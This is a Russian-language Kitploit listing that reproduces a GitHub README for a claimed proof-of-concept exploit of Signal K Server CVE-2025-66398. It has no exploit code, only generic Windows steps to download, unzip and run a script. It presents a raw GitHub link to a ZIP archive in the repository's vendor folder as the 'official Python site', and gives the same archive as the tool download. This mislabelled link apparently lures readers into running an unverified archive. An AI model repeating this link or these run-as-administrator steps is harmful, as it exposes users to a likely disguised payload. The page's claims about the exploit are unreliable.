Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-66398 — Демонстрация эксплуатации Signal K Server CVE-2025-66398, позволяющей неаутентифицированным злоумышленникам внедрить бэкдор и включить удалённое выполнение кода. | Kitploit
Инструменты/GitHubGitHub/showy-headteacher114/cve-2025-66398
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Демонстрация эксплуатации Signal K Server CVE-2025-66398, позволяющей неаутентифицированным злоумышленникам внедрить бэкдор и включить удалённое выполнение кода.

Репозиторий
131 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ cve-2025-66398 - Простой инструмент PoC для RCE

Download


⚙️ Об этом инструменте

Этот проект демонстрирует уязвимость удаленного выполнения кода (RCE) в Signal K Server версии 2.18.0 и ранее. Концептуальное доказательство (PoC) показывает, как злоумышленник может выполнить команды на уязвимом устройстве.

Этот инструмент предназначен для специалистов по безопасности, системных администраторов или всех, кто хочет понять данную проблему безопасности. Для его запуска не требуется навыков программирования, но базовое умение работать с компьютером поможет.


🖥️ Системные требования

  • Windows 10 или новее
  • Не менее 2 ГБ свободной оперативной памяти
  • 100 МБ свободного места на диске
  • Подключение к интернету для загрузки файлов
  • Права администратора НЕ требуются

📥 Как скачать и установить

Нажмите кнопку ниже, чтобы перейти на страницу проекта и скачать файлы.

Download

Шаг 1: Перейдите на страницу загрузки

Перейдите по ссылке выше. Вы увидите список файлов и папок на странице GitHub.

Шаг 2: Скачайте ZIP-файл

Найдите зеленую кнопку Код в правом верхнем углу страницы. Нажмите на нее и выберите Скачать ZIP.

Шаг 3: Распакуйте файлы

  • Найдите скачанный ZIP-файл в папке «Загрузки».
  • Щелкните правой кнопкой мыши по ZIP-файлу и выберите Извлечь все.
  • Выберите папку, куда хотите поместить файлы, и нажмите Извлечь.

Шаг 4: Найдите приложение

Откройте извлеченную папку. Вы должны увидеть файлы, связанные с проектом, такие как скрипты и документацию.


▶️ Как запустить инструмент в Windows

В проекте используются скрипты на Python и Go. Чтобы запустить инструмент, вам нужно будет использовать простое окно командной строки.

Шаг 1: Откройте командную строку

  • Нажмите на клавиатуре Win + R.
  • Введите cmd и нажмите Enter.

Шаг 2: Перейдите в папку

Введите эту команду, заменив path\to\folder на путь к вашей извлеченной папке:

root@kitploit:~
cd path\to\folder

Нажмите Enter.

Шаг 3: Запустите скрипт

Возможно, вы найдете скрипт с именем run.bat или start.bat. Если так, просто введите его имя и нажмите Enter. Например:

root@kitploit:~
run.bat

Если BAT-файла нет, найдите скрипт на Python, заканчивающийся на .py. Для его запуска на вашем ПК должен быть установлен Python (см. следующий раздел).

Введите эту команду для запуска:

root@kitploit:~
python scriptname.py

Замените scriptname.py на фактическое имя файла.


🐍 Установка Python (если нужно)

Если вы получили ошибку о том, что Python не распознан, вам необходимо установить Python.

Шаг 1: Скачайте Python

Перейдите на официальный сайт Python:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Нажмите последний установщик для Windows и скачайте его.

Шаг 2: Установите Python

  • Запустите скачанный установщик.
  • Установите флажок Добавить Python в PATH перед нажатием Установить сейчас.
  • Дождитесь завершения установки.

Шаг 3: Проверьте установку Python

Откройте новое окно командной строки и введите:

root@kitploit:~
python --version

Должна отобразиться установленная версия Python.


🚨 Безопасный запуск инструмента

Этот инструмент предназначен только для тестирования и изучения конкретной уязвимости. Используйте его в безопасной среде, например, в тестовой сети или на изолированной машине.

Никогда не запускайте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.


🔍 Как работает инструмент

Инструмент сканирует устройства, работающие под управлением Signal K Server версии 2.18.0 или ранее. Он пытается отправить команды, эксплуатирующие уязвимость, и проверяет, выполняет ли цель эти команды.

Это позволяет специалистам по безопасности убедиться, что их системы уязвимы, и принять меры по обновлению или защите.


💡 Устранение неполадок

  • Если инструмент не запускается, убедитесь, что вы находитесь в правильной папке в командной строке.
  • Убедитесь, что Python установлен и добавлен в системный PATH.
  • Закройте другие приложения, которые могут блокировать сетевой доступ.
  • Запустите командную строку от имени администратора, если возникают ошибки разрешений.
  • Убедитесь, что целевое устройство доступно в сети.

📄 Дополнительные ресурсы

Для получения дополнительной информации об уязвимости CVE-2025-66398 выполните поиск в базах данных безопасности или на GitHub по соответствующим исследованиям.


🔗 Ссылка для скачивания

Перейдите на эту страницу, чтобы скачать файлы инструмента:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Скачать инструмент